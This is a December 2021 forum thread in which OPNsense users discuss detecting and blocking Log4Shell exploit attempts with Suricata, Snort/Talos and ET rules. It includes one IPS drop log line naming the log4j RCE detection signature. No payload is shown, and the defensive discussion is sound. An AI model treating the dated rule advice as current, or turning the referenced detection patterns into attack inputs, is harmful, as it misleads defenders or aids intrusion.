log4j vulnerability detection

Started by fwRookie, December 13, 2021, 08:51:01 AM

Previous topic - Next topic
It is possible to detect and block the log4j hacking attempts with the OPNSense firewall (or other parts) rules?
I know other firewalls already have rules available to detect and block possible attempts, like https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability


Hi, I am not sure if this will help at all ... google states:

QuoteThe Cloud Armor WAF rules use a variety of techniques to detect attempted obfuscations and bypasses within attempted exploits of CVE-2021-44228.

But there are probably just way to many ways to obfuscate that simple string ... good enough to catch the script kiddies.

Best regards,

    Space


December 13, 2021, 04:06:43 PM #3 Last Edit: December 13, 2021, 04:08:49 PM by XeroX
Snort Rules in server-web and server-other detect Log4j aswell. As long as traffic is not end to end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11


Quote from: XeroX on December 13, 2021, 04:06:43 PM
Snort Rules in server-web and server-other detect Log4j aswell. As long as traffic is not end to end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11

are you using Snort on Opns? i am having issues with Suricata.
DEC4240 – OPNsense Owner

nginx has naxsi which may be used for blocking as well.

Quote from: Julien on December 14, 2021, 03:12:44 PM
Quote from: XeroX on December 13, 2021, 04:06:43 PM
Snort Rules in server-web and server-other detect Log4j aswell. As long as traffic is not end to end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11

are you using Snort on Opns? i am having issues with Suricata.

No I'm using suricata with additional Snort Rules. Use 29190. Don't use 3.x rules.

December 19, 2021, 11:59:49 AM #7 Last Edit: December 19, 2021, 12:37:49 PM by dennis_u
Quote from: fwRookie on December 13, 2021, 08:51:01 AM
It is possible to detect and block the log4j hacking attempts with the OPNSense firewall (or other parts) rules?

Yes, it does. It even blocks my internal researches about the vulnerability (e.g. internal requests based und CSRF). Update your ET rules and test it.

But a more general question from my side: our OPNsense even blocks the "IPS blocks Log4Shell" logs to our SIEM, since they match the Log4shell patterns:

[Drop] [1:2034672:1] ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M1 (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {UDP} 10.10.x.1:51488 -> 10.10.x.69:516

The interface 10.10.x.1 points to valuable IT assets and I do not want to disable IPS here. Can I whitelist the OPNsense from IPS?
OPNsense consulting, installation, configuration and care by DU Consult

What dennis_u said!  :) Having the same issue.
Running OPNsense through Proxmox
4 x Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz (1 Socket)
24 GB RAM

Quote from: XeroX on December 17, 2021, 01:27:40 AM
Quote from: Julien on December 14, 2021, 03:12:44 PM
Quote from: XeroX on December 13, 2021, 04:06:43 PM
Snort Rules in server-web and server-other detect Log4j aswell. As long as traffic is not end to end encrypted.

https://www.snort.org/advisories/talos-rules-2021-12-11

are you using Snort on Opns? i am having issues with Suricata.
3.x rules what are those?

Thank you

No I'm using suricata with additional Snort Rules. Use 29190. Don't use 3.x rules.
DEC4240 – OPNsense Owner